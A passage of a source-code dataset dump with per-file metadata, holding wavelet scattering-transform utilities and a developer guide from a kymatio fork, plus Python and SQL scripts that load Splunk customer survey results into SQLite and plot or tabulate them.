1):\n ind_start[j] = (ind_start[j - 1] // 2) + (ind_start[j - 1] % 2)\n ind_end[j] = (ind_end[j - 1] // 2) + (ind_end[j - 1] % 2)\n return ind_start, ind_end\n\ndef compute_padding(J_pad, T):\n \"\"\"\n Computes the padding to be added on the left and on the right\n of the signal.\n\n It should hold that 2**J_pad >= T\n\n Parameters\n ----------\n J_pad : int\n 2**J_pad is the support of the padded signal\n T : int\n original signal support size\n\n Returns\n -------\n pad_left: amount to pad on the left (\"beginning\" of the support)\n pad_right: amount to pad on the right (\"end\" of the support)\n \"\"\"\n T_pad = 2**J_pad\n if T_pad < T:\n raise ValueError('Padding support should be larger than the original' +\n 'signal size!')\n to_add = 2**J_pad - T\n pad_left = to_add // 2\n pad_right = to_add - pad_left\n if max(pad_left, pad_right) >= T:\n raise ValueError('Too large padding value, will lead to NaN errors')\n return pad_left, pad_right\n\ndef compute_minimum_support_to_pad(T, J, Q, criterion_amplitude=1e-3,\n normalize='l1', r_psi=math.sqrt(0.5),\n sigma0=1e-1, alpha=5., P_max=5, eps=1e-7):\n\n\n \"\"\"\n Computes the support to pad given the input size and the parameters of the\n scattering transform.\n\n Parameters\n ----------\n T : int\n temporal size of the input signal\n J : int\n scale of the scattering\n Q : int\n number of wavelets per octave\n normalize : string, optional\n normalization type for the wavelets.\n Only `'l2'` or `'l1'` normalizations are supported.\n Defaults to `'l1'`\n criterion_amplitude: float `>0` and `<1`, optional\n Represents the numerical error which is allowed to be lost after\n convolution and padding.\n The larger criterion_amplitude, the smaller the padding size is.\n Defaults to `1e-3`\n r_psi : float, optional\n Should be `>0` and `<1`. Controls the redundancy of the filters\n (the larger r_psi, the larger the overlap between adjacent\n wavelets).\n Defaults to `sqrt(0.5)`.\n sigma0 : float, optional\n parameter controlling the frequential width of the\n low-pass filter at J_scattering=0; at a an absolute J_scattering,\n it is equal to :math:`\\\\frac{\\\\sigma_0}{2^J}`.\n Defaults to `1e-1`.\n alpha : float, optional\n tolerance factor for the aliasing after subsampling.\n The larger the alpha, the more conservative the value of maximal\n subsampling is.\n Defaults to `5`.\n P_max : int, optional\n maximal number of periods to use to make sure that the Fourier\n transform of the filters is periodic.\n `P_max = 5` is more than enough for double precision.\n Defaults to `5`.\n eps : float, optional\n required machine precision for the periodization (single\n floating point is enough for deep learning applications).\n Defaults to `1e-7`.\n\n Returns\n -------\n min_to_pad: int\n minimal value to pad the signal on one size to avoid any\n boundary error.\n \"\"\"\n J_tentative = int(np.ceil(np.log2(T)))\n _, _, _, t_max_phi = scattering_filter_factory(\n J_tentative, J, Q, normalize=normalize, to_torch=False,\n max_subsampling=0, criterion_amplitude=criterion_amplitude,\n r_psi=r_psi, sigma0=sigma0, alpha=alpha, P_max=P_max, eps=eps)\n min_to_pad = 3 * t_max_phi\n return min_to_pad\n\n\ndef precompute_size_scattering(J, Q, max_order=2, detail=False):\n \"\"\"Get size of the scattering transform\n\n The number of scattering coefficients depends on the filter\n configuration and so can be calculated using a few of the scattering\n transform parameters.\n\n Parameters\n ----------\n J : int\n The maximum log-scale of the scattering transform.\n In other words, the maximum scale is given by `2**J`.\n Q : int >= 1\n The number of first-order wavelets per octave.\n Second-order wavelets are fixed to one wavelet per octave.\n max_order : int, optional\n The maximum order of scattering coefficients to compute.\n Must be either equal to `1` or `2`. Defaults to `2`.\n detail : boolean, optional\n Specifies whether to provide a detailed size (number of coefficient\n per order) or an aggregate size (total number of coefficients).\n\n Returns\n -------\n size : int or tuple\n If `detail` is `False`, returns the number of coefficients as an\n integer. If `True`, returns a tuple of size `max_order` containing\n the number of coefficients in each order.\n \"\"\"\n sigma_low, xi1, sigma1, j1, xi2, sigma2, j2 = \\\n calibrate_scattering_filters(J, Q)\n\n size_order0 = 1\n size_order1 = len(xi1)\n size_order2 = 0\n for n1 in range(len(xi1)):\n for n2 in range(len(xi2)):\n if j2[n2] > j1[n1]:\n size_order2 += 1\n if detail:\n if max_order == 2:\n return size_order0, size_order1, size_order2\n else:\n return size_order0, size_order1\n else:\n if max_order == 2:\n return size_order0 + size_order1 + size_order2\n else:\n return size_order0 + size_order1\n\n\ndef compute_meta_scattering(J, Q, max_order=2):\n \"\"\"Get metadata on the transform.\n\n This information specifies the content of each scattering coefficient,\n which order, which frequencies, which filters were used, and so on.\n\n Parameters\n ----------\n J : int\n The maximum log-scale of the scattering transform.\n In other words, the maximum scale is given by `2**J`.\n Q : int >= 1\n The number of first-order wavelets per octave.\n Second-order wavelets are fixed to one wavelet per octave.\n max_order : int, optional\n The maximum order of scattering coefficients to compute.\n Must be either equal to `1` or `2`. Defaults to `2`.\n\n Returns\n -------\n meta : dictionary\n A dictionary with the following keys:\n\n - `'order`' : tensor\n A Tensor of length `C`, the total number of scattering\n coefficients, specifying the scattering order.\n - `'xi'` : tensor\n A Tensor of size `(C, max_order)`, specifying the center\n frequency of the filter used at each order (padded with NaNs).\n - `'sigma'` : tensor\n A Tensor of size `(C, max_order)`, specifying the frequency\n bandwidth of the filter used at each order (padded with NaNs).\n - `'j'` : tensor\n A Tensor of size `(C, max_order)`, specifying the dyadic scale\n of the filter used at each order (padded with NaNs).\n - `'n'` : tensor\n A Tensor of size `(C, max_order)`, specifying the indices of\n the filters used at each order (padded with NaNs).\n - `'key'` : list\n The tuples indexing the corresponding scattering coefficient\n in the non-vectorized output.\n \"\"\"\n sigma_low, xi1s, sigma1s, j1s, xi2s, sigma2s, j2s = \\\n calibrate_scattering_filters(J, Q)\n\n meta = {}\n\n meta['order'] = [[], [], []]\n meta['xi'] = [[], [], []]\n meta['sigma'] = [[], [], []]\n meta['j'] = [[], [], []]\n meta['n'] = [[], [], []]\n meta['key'] = [[], [], []]\n\n meta['order'][0].append(0)\n meta['xi'][0].append(())\n meta['sigma'][0].append(())\n meta['j'][0].append(())\n meta['n'][0].append(())\n meta['key'][0].append(())\n\n for (n1, (xi1, sigma1, j1)) in enumerate(zip(xi1s, sigma1s, j1s)):\n meta['order'][1].append(1)\n meta['xi'][1].append((xi1,))\n meta['sigma'][1].append((sigma1,))\n meta['j'][1].append((j1,))\n meta['n'][1].append((n1,))\n meta['key'][1].append((n1,))\n\n if max_order < 2:\n continue\n\n for (n2, (xi2, sigma2, j2)) in enumerate(zip(xi2s, sigma2s, j2s)):\n if j2 > j1:\n meta['order'][2].append(2)\n meta['xi'][2].append((xi1, xi2))\n meta['sigma'][2].append((sigma1, sigma2))\n meta['j'][2].append((j1, j2))\n meta['n'][2].append((n1, n2))\n meta['key'][2].append((n1, n2))\n\n for field, value in meta.items():\n meta[field] = value[0] + value[1] + value[2]\n\n pad_fields = ['xi', 'sigma', 'j', 'n']\n pad_len = max_order\n\n for field in pad_fields:\n meta[field] = [x + (math.nan,) * (pad_len - len(x)) for x in meta[field]]\n\n array_fields = ['order', 'xi', 'sigma', 'j', 'n']\n\n for field in array_fields:\n meta[field] = np.array(meta[field])\n\n return meta\n"
},
{
"alpha_fraction": 0.7156786322593689,
"alphanum_fraction": 0.7199687957763672,
"avg_line_length": 36.159420013427734,
"blob_id": "3ec90d00f44c9f84e546d8a4583883c02641d78d",
"content_id": "1b639445983e38256884a15dc02f157eba42e3dd",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 2564,
"license_type": "permissive",
"max_line_length": 200,
"num_lines": 69,
"path": "/doc/source/developerguide.rst",
"repo_name": "changhongw/kymatio",
"src_encoding": "UTF-8",
"text": ".. _dev-guide:\n\nInformation for developers\n**************************\n\n(GitHub Workflow)\n=================\n\nKymatio implements the scattering transform for different frontends (currently ``numpy``, ``torch``, ``tensorflow``),\neach of which have one or more corresponding backends. This way, the generic scattering algorithm can be written in an\narchitecture-agnostic manner, since all low-level operations are relegated to the backend, and high-level operations\nspecific to an API are relegated to the frontend.\n\nTo make sure that a future pull request (PR) will pass the jenkins and travis tests, please try our package on the\nunit tests, the speed as well as the documentation. You might need to install auxiliary libraries via the\n``requirements_optional.txt``.\n\nFor development purposes, you might need to install the package via::\n\n git clone https://github.com/kymatio/kymatio.git\n git checkout origin/dev\n cd kymatio\n python setup.py develop\n\nPlease refer to `https://www.atlassian.com/git/tutorials/comparing-workflows/gitflow-workflow <https://www.atlassian.com/git/tutorials/comparing-workflows/gitflow-workflow>`_ for more recommendations.\n\nBackend to frontend: core of the algorithm\n==========================================\n\nCommon to the 1D, 2D and 3D scattering transform routines are four low-level functions which must be optimized:\n\n1. Fast Fourier transform (FFT) and its inverse (iFFT)\n2. Subsampling in the Fourier domain (periodization)\n3. Non-linearity (modulus in 1D and 2D, quadratic mean in 3D)\n4. Dotwise complex multiplication (``cdgmm``)\n5. Padding and unpadding\n\nChecking unit tests\n===================\n\nFor running all the unit tests and avoiding bugs, please first install the latest versions of ``numpy``, ``tensorflow``,\n``torch``, ``cupy``, ``scikit-cuda``. Then, run (in the root directory)::\n\n pytest\n\nIf all the tests pass, you may submit your pull request as explained below. A speed-test is welcome as well.\n\nChecking speed\n==============\n\nFor checking the speed of a given PR, run the ASV benchmarks on various architectures via::\n\n cd benchmarks\n run asv\n\nChecking documentation\n======================\n\nFor checking the documentation, please run the following commands, that will built it through sphinx::\n\n cd doc\n make clean\n make html\n\nProposing a pull request\n========================\n\nEach PR must be documented using docstrings, illustrated with an example and must pass the unit tests. Please check the\nPRs already merged on the GitHub repository if you need an example of a good PR.\n"
},
{
"alpha_fraction": 0.75,
"alphanum_fraction": 0.7840909361839294,
"avg_line_length": 40.06666564941406,
"blob_id": "bd745e0569f6d1e7931baa207122a564156b0384",
"content_id": "8a9d7bd68c76fcfdcb01e6841b623ffd43cc430c",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 616,
"license_type": "permissive",
"max_line_length": 83,
"num_lines": 15,
"path": "/kymatio/torch.py",
"repo_name": "changhongw/kymatio",
"src_encoding": "UTF-8",
"text": "from .scattering1d.frontend.torch_frontend import ScatteringTorch1D as Scattering1D\nfrom .scattering2d.frontend.torch_frontend import ScatteringTorch2D as Scattering2D\nfrom .scattering3d.frontend.torch_frontend \\\n import HarmonicScatteringTorch3D as HarmonicScattering3D\n\nScattering1D.__module__ = 'kymatio.torch'\nScattering1D.__name__ = 'Scattering1D'\n\nScattering2D.__module__ = 'kymatio.torch'\nScattering2D.__name__ = 'Scattering2D'\n\nHarmonicScattering3D.__module__ = 'kymatio.torch'\nHarmonicScattering3D.__name__ = 'HarmonicScattering3D'\n\n__all__ = ['Scattering1D', 'Scattering2D', 'HarmonicScattering3D']\n"
}
] | 40 |
keroro824/splunksurvey_scripts
|
https://github.com/keroro824/splunksurvey_scripts
|
edbbfac4d50692f832bc4097de734feec40c0f95
|
34e24e6be922724adae3cfea5db0102f0c608eeb
|
a9935117ab93d7cd5687867d2a965b7ccdac2cfc
|
refs/heads/master
| 2020-06-12T11:18:21.884968 | 2014-03-30T23:27:40 | 2014-03-30T23:27:40 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5572693347930908,
"alphanum_fraction": 0.5689802765846252,
"avg_line_length": 36.63440704345703,
"blob_id": "539be81c73ce2c093b32d46f25dd6779dd240bc7",
"content_id": "07196e1e2437ab2cbea4604f63cc57786d5c82fa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3501,
"license_type": "no_license",
"max_line_length": 200,
"num_lines": 93,
"path": "/scripts/db.py",
"repo_name": "keroro824/splunksurvey_scripts",
"src_encoding": "UTF-8",
"text": "import csv\nfrom contextlib import closing\nfrom sqlite3 import connect\n\nDATABASE = \"surveyresults.db\"\nSQLSCRIPT = \"scripts/surveyresults.sql\"\nQUESTIONS_CSV = \"data/CSV/Questions.csv\"\nQUESTION_OPT_CSV = \"data/CSV/QuestionOptions.csv\"\nRESPONDENTS_CSV = \"data/CSV/Respondents.csv\"\nRESPONSES_TEXT_CSV = \"data/CSV/ResponsesText.csv\"\nRESPONSES_CSV = \"data/CSV/Responses.csv\"\nQUESTION_OPT_LABEL_CSV = \"data/CSV/question_option_labels_for_graphing.csv\"\n\ndef init(script):\n execute_db_script(script)\n\ndef execute_db_script(script):\n with closing(connect_db()) as db:\n with open(script) as f:\n db.cursor().executescript(f.read())\n db.commit()\n\ndef connect_db():\n return connect(DATABASE)\n\ndef load(csvfile):\n db = connect_db()\n with open(csvfile, 'rU') as csvdata:\n csvreader = csv.reader(csvdata)\n first = True\n for row in csvreader:\n if first: # if there's a header -- a line with the column names in it -- skip it\n first = False\n continue\n insert_information(csvfile, db, *row) # assume row is a list containing three values, one for column1, one for column2, and one for column3\n db.close()\n\ndef insert_information(csvfile, db, *row):\n if csvfile == QUESTIONS_CSV:\n cursor = db.cursor()\n cursor.execute(\"INSERT INTO Questions \\\n (QuestionID, PageID, Position, QType, Heading) \\\n VALUES (?,?,?,?,?)\",\n [row[0], row[1], row[2], row[3], row[4]])\n db.commit()\n\n if csvfile == QUESTION_OPT_CSV:\n cursor = db.cursor()\n cursor.execute(\"INSERT INTO QuestionOptions \\\n (OptionID, OptionType, OptionNum, QuestionID, OptionText) \\\n VALUES (?,?,?,?,?)\",\n [unicode(row[0], errors='ignore'), unicode(row[1], errors='ignore'), unicode(row[2], errors='ignore'), unicode(row[3], errors='ignore'), unicode(row[4], errors='ignore')]) \n db.commit() \n\n if csvfile == RESPONSES_CSV:\n cursor = db.cursor()\n cursor.execute(\"INSERT INTO Responses \\\n (RespondentID, CollectorID, QuestionID, Key1, Key2, Key3, DateAdded) \\\n VALUES (?,?,?,?,?,?,?)\",\n [row[0], row[1], row[2], row[3], row[4], row[5], row[6]])\n db.commit()\n\n if csvfile == RESPONDENTS_CSV:\n cursor = db.cursor()\n cursor.execute(\"INSERT INTO Respondents \\\n (RespondentID, CollectorID, IPAddress, Email, FirstName, LastName, CustomData, DateAdded) \\\n VALUES (?,?,?,?,?,?,?,?)\",\n [row[0], row[1], row[2], row[3], row[4], row[5], row[6], row[7]])\n db.commit() \n\n if csvfile == RESPONSES_TEXT_CSV:\n cursor = db.cursor()\n cursor.execute(\"INSERT INTO ResponsesText \\\n (RespondentID, CollectorID, QuestionID, Key1, ResponsesText, DateAdded) \\\n VALUES (?,?,?,?,?,?)\",\n [row[0], row[1], row[2], row[3], row[4], row[5]])\n db.commit()\n\n if csvfile == QUESTION_OPT_LABEL_CSV:\n cursor = db.cursor()\n cursor.execute(\"INSERT INTO OptionLabel \\\n (OptionID, OptionLabel) \\\n VALUES (?,?)\",\n [row[0], row[1]])\n db.commit()\n\ninit(SQLSCRIPT)\nload(QUESTIONS_CSV)\nload(QUESTION_OPT_CSV)\nload(RESPONDENTS_CSV)\nload(RESPONSES_CSV)\nload(RESPONSES_TEXT_CSV)\nload(QUESTION_OPT_LABEL_CSV)\n\n"
},
{
"alpha_fraction": 0.7556623220443726,
"alphanum_fraction": 0.7755662202835083,
"avg_line_length": 19.23611068725586,
"blob_id": "3d6410063ba8badb709106d72005f31af377df79",
"content_id": "b549c4833f9baa7b4378c3434bb9f47c0d90aee4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 1458,
"license_type": "no_license",
"max_line_length": 39,
"num_lines": 72,
"path": "/scripts/surveyresults.sql",
"repo_name": "keroro824/splunksurvey_scripts",
"src_encoding": "UTF-8",
"text": "DROP TABLE IF EXISTS Questions;\nDROP TABLE IF EXISTS QuestionOptions;\nDROP TABLE IF EXISTS Responses;\nDROP TABLE IF EXISTS Respondents;\nDROP TABLE IF EXISTS ResponsesText ;\nDROP TABLE IF EXISTS OptionLabel;\n\nCREATE TABLE Questions(\n\tQuestionID INT,\n\tPageID INT,\n\tPosition INT,\n\tQType INT,\n\tHeading VARCHAR(255),\n\tPRIMARY KEY (QuestionID)\n);\n\nCREATE TABLE QuestionOptions(\n\tOptionID INT,\n\tOptionType INT,\n\tOptionNum INT,\n\tQuestionID INT,\n\tOptionText VARCHAR(255),\n\tPRIMARY KEY (OptionID),\n\tFOREIGN KEY (QuestionID)\n\t\tREFERENCES Questions(QuestionID)\n);\n\nCREATE TABLE Responses(\n\tRespondentID INT,\n\tCollectorID INT,\n\tQuestionID INT,\n\tKey1 INT,\n\tKey2 INT,\n\tKey3 INT,\n\tDateAdded TIMESTAMP,\n\tFOREIGN KEY (RespondentID)\n\t\tREFERENCES Respondents(RespondentID),\n\tFOREIGN KEY (QuestionID)\n\t\tREFERENCES Questions(QuestionID)\t\n);\n\nCREATE TABLE Respondents(\n\tRespondentID INT,\n\tCollectorID INT,\n\tIPAddress VARCHAR(255),\n\tEmail VARCHAR(255),\n\tFirstName VARCHAR(255),\n\tLastName VARCHAR(255),\n\tCustomData VARCHAR(255),\n\tDateAdded TIMESTAMP,\n\tPRIMARY KEY (RespondentID)\n);\n\nCREATE TABLE ResponsesText(\n\tRespondentID INT,\n\tCollectorID INT,\n\tQuestionID INT,\n\tKey1 INT,\n\tResponsesText VARCHAR(255),\n\tDateAdded TIMESTAMP,\n\tFOREIGN KEY (RespondentID)\n\t\tREFERENCES Respondents(RespondentID),\n\tFOREIGN KEY (QuestionID)\n\t\tREFERENCES Questions(QuestionID),\n\tFOREIGN KEY (Key1)\n\t\tREFERENCES QuestionOptions(OptionID)\n);\n\nCREATE TABLE OptionLabel(\n\tOptionID INT,\n\tOptionLabel TEXT\n);\n"
},
{
"alpha_fraction": 0.5688775777816772,
"alphanum_fraction": 0.5758928656578064,
"avg_line_length": 35.44186019897461,
"blob_id": "fa0562edfdfb663d7ee2ef29d0e40e7a868f81f3",
"content_id": "347c1d1633ffead0ad5317b88bc2e21fb1381006",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1568,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 43,
"path": "/scripts/response_categories_by_question.py",
"repo_name": "keroro824/splunksurvey_scripts",
"src_encoding": "UTF-8",
"text": "\nimport sqlite3\nfrom collections import defaultdict\n\n\ndef main():\n con = sqlite3.connect('surveyresults.db')\n con.text_factory = str\n cur = con.cursor()\n\n cur.execute(\"SELECT QuestionID FROM Questions WHERE QType = 40;\") # TODO: Other question types?\n question_ids = [r[0] for r in cur.fetchall()]\n \n questions = {}\n for id in question_ids:\n\n # For each question, get count of responses and response labels.\n cur.execute(\"SELECT RespondentID, ColumnLabel, RowLabel \\\n FROM \\\n ( SELECT OptionID as K3, OptionLabel as ColumnLabel \\\n FROM QuestionOptions ), \\\n ( SELECT OptionID as K1, OptionLabel as RowLabel \\\n FROM QuestionOptions ), \\\n Responses \\\n WHERE Responses.QuestionID=? \\\n AND Responses.Key3=K3 \\\n AND Responses.Key1=K1\", [id])\n\n respondents = {}\n responses = cur.fetchall()\n for (respondent, column_label, row_label) in responses:\n if not respondent in respondents:\n respondents[respondent] = defaultdict(list)\n respondents[respondent][column_label].append(row_label)\n \n questions[id] = respondents\n\n for (id, all_answers) in questions.iteritems():\n for (respondent, customers) in all_answers.iteritems():\n for (customer, answers) in customers.iteritems():\n print id, respondent, customer, answers\n\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.6318055987358093,
"alphanum_fraction": 0.6496462821960449,
"avg_line_length": 30.52427101135254,
"blob_id": "3046d730735476ab46170eda0a3f8c3e43eb6ce3",
"content_id": "64c11faa0f8274daaeb953d1e4471a9d8d9bec5d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3251,
"license_type": "no_license",
"max_line_length": 137,
"num_lines": 103,
"path": "/scripts/plot_data.py",
"repo_name": "keroro824/splunksurvey_scripts",
"src_encoding": "UTF-8",
"text": "\nimport copy\nimport math\nimport os\nimport sqlite3\nimport textwrap\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\nfrom matplotlib import pyplot as mpl\nfrom numpy import argsort, linspace\n\ndef plot_vertical_bar(id, response_count, response_label):\n\tN = len(response_count)\n\tind = np.arange(N)\n\twidth = 0.25\n\tmaxcount = max(response_count)\n\n\tfig, ax = plt.subplots()\n\tplt.subplots_adjust(bottom=.5, left=.6)\n\trects = ax.bar(ind+width, response_count, width, color=\"black\", align=\"center\")\n\n\tax.set_ylabel(\"Number of customers (n=39)\")\n\tax.set_ymargin(1)\n\tax.set_ylim(top=((maxcount/10+1)*10))\n\n\tax.set_xticks(ind+width)\n\tplt.xticks(rotation=90)\n\tax.set_xticklabels(response_label, multialignment=\"right\")\n\n\t# Add numeric labels on top of bars.\n\tfor rect in rects:\n\t\theight = rect.get_height()\n\t\tax.text(rect.get_x()+rect.get_width()/2., 1.05*height, '%d'%int(height),\n\t\t\t\tha=\"center\", va=\"bottom\")\n\n\tplt.savefig(\"\".join([\"pic/\", str(id), \".png\"]))\n\tplt.close()\n\ndef plot_horizontal_bar(id, response_count, response_label):\n\tmax_count = max(response_count)\n\typos = np.arange(len(response_label))\n\t\n\tfig, ax = plt.subplots()\n\trects = plt.barh(ypos, response_count, align=\"center\", color=\"black\", height=.25)\n\n\tplt.yticks(ypos, response_label)\n\tplt.xlim(xmax=((max_count/10+1)*10))\n\tplt.rcParams.update({'font.size': 10})\n\tplt.xlabel(\"Number of customers (n=39)\")\n\tif id==528410987:\n\t\tplt.subplots_adjust(left=.4)\n\telse:\n\t\tplt.subplots_adjust(left=.3)\n\t\n\tfor rect in rects:\n\t\twidth = rect.get_width()\n\t\tax.text(width+.5, rect.get_y()+rect.get_height()/2., '%d'%int(width),\n\t\t\t\tha=\"left\", va=\"center\")\n\n\tplt.savefig(\"\".join([\"pic/\", str(id), \".png\"]))\n\tplt.close()\n\ndef main():\n con = sqlite3.connect('surveyresults.db')\n con.text_factory = str\n cur = con.cursor()\n\n cur.execute(\"SELECT QuestionID FROM Questions WHERE QType = 40;\") # TODO: Other question types?\n question_ids = [r[0] for r in cur.fetchall()]\n\n iteration = 0\n for id in question_ids:\n\n # For each question, get count of responses and response labels.\n cur.execute((\"SELECT Questions.Heading, count(*), QuestionOptions.OptionLabel, QuestionOptions.OptionText, Questions.QuestionID \\\n FROM Questions, QuestionOptions, Responses \\\n WHERE Questions.QuestionID=? AND QuestionOptions.QuestionID=? AND QuestionOptions.OptionID=Responses.Key1 \\\n GROUP BY Questions.QuestionID, QuestionOptions.OptionID;\"), [id, id])\n \n responses = cur.fetchall()\n responses = sorted(responses, key=lambda x: x[1])\n \n # Debugging information to compare to SurveyMonkey counts\n print iteration, responses[0][4], responses[0][0]\n print r\"\\begin{itemize}\"\n for (heading, count, label, text, id) in responses:\n #print label, count, text\n print r\"\\item\", text\n print r\"\\end{itemize}\"\n print \n \n response_count = [r[1] for r in responses]\n response_label = [r[2] for r in responses]\n\n # Plot responses.\n #plot_vertical_bar(id, response_count, response_label)\n plot_horizontal_bar(id, response_count, response_label)\n iteration += 1\n\nif __name__ == \"__main__\":\n\tmain()\n\n\t\n"
},
{
"alpha_fraction": 0.6038415431976318,
"alphanum_fraction": 0.609843909740448,
"avg_line_length": 28.714284896850586,
"blob_id": "96c0ef10e6ba3c7e369e3ec07e21cb088044326a",
"content_id": "21a88644a3352974c165bbf81bd26542f35a32f7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 833,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 28,
"path": "/scripts/print_writein_responses.py",
"repo_name": "keroro824/splunksurvey_scripts",
"src_encoding": "UTF-8",
"text": "\nimport sys\nimport sqlite3\nfrom collections import defaultdict\n\ndef main():\n con = sqlite3.connect('surveyresults.db')\n con.text_factory = str\n cur = con.cursor()\n \n cur.execute(\"SELECT RespondentID, ResponsesText.QuestionID, Key1, ResponsesText \\\n FROM ResponsesText, Questions \\\n WHERE ResponsesText.QuestionID=Questions.QuestionID \\\n AND (Questions.QType=40)\")\n\n rows = cur.fetchall()\n questions = defaultdict(list)\n for (respondent, question, key, text) in rows:\n questions[question].append(text)\n \n\n for (question, text_list) in questions.iteritems():\n print question\n print r\"\\squishitem\"\n print \"\\n\".join([\"\\item \" + s for s in text_list])\n print r\"\\squishend\"\n\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.5532969832420349,
"alphanum_fraction": 0.5624690055847168,
"avg_line_length": 35.33333206176758,
"blob_id": "acd9920f08de528b421c13f2d605aebeaea8d036",
"content_id": "8fccada53d8f2d6d6db21dce661f46857c0b1b2c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4034,
"license_type": "no_license",
"max_line_length": 101,
"num_lines": 111,
"path": "/scripts/customer_profiles.py",
"repo_name": "keroro824/splunksurvey_scripts",
"src_encoding": "UTF-8",
"text": "\nimport sys\nimport sqlite3\nfrom collections import defaultdict\n\ndef print_customers(customers, question_headings):\n num = 1\n for (name, question) in customers.iteritems():\n name = name.replace(\" \", \"\")\n print r\"\"\"\n\\begin{table}[H]\n\\begin{footnotesize}\n\\begin{center}\n\\begin{tabular}{|p{.6\\textwidth}|p{.4\\textwidth}|} \\hline\n\\textit{Question} & \\textit{Answer} \\\\ \\hline\n \"\"\"\n for (id, answers) in question.iteritems():\n sys.stdout.write(\"%s & %s \\\\\\\\ \\\\hline \\n\" % (question_headings[id], \"; \".join(answers)))\n #print question_headings[id]\n #print answers\n print r\"\"\"\n\\end{tabular}\n\\end{center}\n\\label{tab:%s}\n\\caption{Customer %d}\n\\end{footnotesize}\n\\end{table}\n \"\"\" % (name, num)\n print\n num += 1\n\ndef main():\n con = sqlite3.connect('surveyresults.db')\n con.text_factory = str\n cur = con.cursor()\n\n cur.execute(\"SELECT QuestionID FROM Questions WHERE QType = 40;\") # TODO: Other question types?\n question_ids = [r[0] for r in cur.fetchall()]\n \n cur.execute(\"SELECT QuestionID, Heading from Questions\")\n question_headings = dict(cur.fetchall())\n\n questions = {}\n for id in question_ids:\n\n # For each question, get count of responses and response labels.\n cur.execute(\"SELECT RespondentID, ColumnLabel, RowLabel \\\n FROM \\\n ( SELECT OptionID as K3, OptionLabel as ColumnLabel \\\n FROM QuestionOptions ), \\\n ( SELECT OptionID as K1, OptionLabel as RowLabel \\\n FROM QuestionOptions ), \\\n Responses \\\n WHERE Responses.QuestionID=? \\\n AND Responses.Key3=K3 \\\n AND Responses.Key1=K1\", [id])\n\n respondents = {}\n responses = cur.fetchall()\n for (respondent, column_label, row_label) in responses:\n if not respondent in respondents:\n respondents[respondent] = defaultdict(list)\n respondents[respondent][column_label].append(row_label)\n \n questions[id] = respondents\n\n cur.execute(\"SELECT RespondentID, ResponsesText.QuestionID, Key1, ResponsesText \\\n FROM ResponsesText, Questions \\\n WHERE ResponsesText.QuestionID=Questions.QuestionID \\\n AND (Questions.QType=100 OR Questions.QType=80)\")\n\n q = {}\n rows = cur.fetchall()\n for (respondent, question, key, text) in rows:\n if not question in q:\n q[question] = {}\n if not respondent in q[question]:\n q[question][respondent] = []\n q[question][respondent].append((key, text))\n\n for (id, question) in q.iteritems():\n if not id in questions:\n questions[id] = {}\n for (respondent, answers) in question.iteritems():\n answers = sorted(answers, key=lambda x: x[0])\n num = 1\n for (key, text) in answers:\n if not respondent in questions[id]:\n questions[id][respondent] = {}\n questions[id][respondent][\"Customer \"+str(num)] = [text]\n num += 1\n\n print questions[528408871]\n\n customers = {}\n for (id, all_answers) in questions.iteritems():\n for (respondent, three_customers) in all_answers.iteritems():\n for (customer, answers) in three_customers.iteritems():\n cur.execute(\"SELECT ResponsesText FROM ResponsesText \\\n WHERE Key1=0 AND QuestionID=? AND RespondentID=?\", [id, respondent])\n addl_info = cur.fetchall()\n name = '-'.join([str(respondent), customer])\n if not name in customers:\n customers[name] = {}\n if len(addl_info) > 0:\n answers = answers + [a[0] for a in addl_info]\n customers[name][id] = answers\n\n print_customers(customers, question_headings)\n\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.5153061151504517,
"alphanum_fraction": 0.5725623369216919,
"avg_line_length": 26.546875,
"blob_id": "a3799e3459c8ac643c3e0851080d9d4cd1354680",
"content_id": "0a347340d3f02ff7272dbe2d36b232bf480b20ed",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1764,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 64,
"path": "/scripts/print_other_question_responses.py",
"repo_name": "keroro824/splunksurvey_scripts",
"src_encoding": "UTF-8",
"text": "\nimport sys\nimport sqlite3\nfrom collections import defaultdict\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef main():\n con = sqlite3.connect('surveyresults.db')\n con.text_factory = str\n cur = con.cursor()\n \n cur.execute(\"SELECT ResponsesText FROM ResponsesText WHERE QuestionID=528408871\")\n responses = cur.fetchall()\n print r\"\\squishitem\"\n for (response,) in responses:\n print r\"\\item\", response\n print r\"\\squishend\"\n \n cur.execute(\"SELECT ResponsesText FROM ResponsesText WHERE QuestionID=528408904\")\n values = [int(r[0]) for r in cur.fetchall()]\n\n d = {}\n d[\"0-9\"] = 0\n d[\"10-99\"] = 0\n d[\"100-999\"] = 0\n d[\"1000+\"] = 0\n\n for value in values:\n if value >= 0 and value <= 9:\n d[\"0-9\"] += 1\n if value >= 10 and value <= 99:\n d[\"10-99\"] += 1\n if value >= 100 and value <= 999:\n d[\"100-999\"] += 1\n if value >= 1000:\n d[\"1000+\"] += 1\n\n d = sorted(d.items(), key=lambda x: x[0])\n response_count = [i[1] for i in d]\n print response_count\n response_label = [i[0] for i in d]\n\n max_count = max(response_count)\n ypos = np.arange(len(response_label))\n \n fig, ax = plt.subplots()\n rects = plt.barh(ypos, response_count, align=\"center\", color=\"black\", height=.25)\n\n plt.yticks(ypos, response_label)\n plt.xlim(xmax=((max_count/10+1)*10))\n plt.xlabel(\"Number of customers 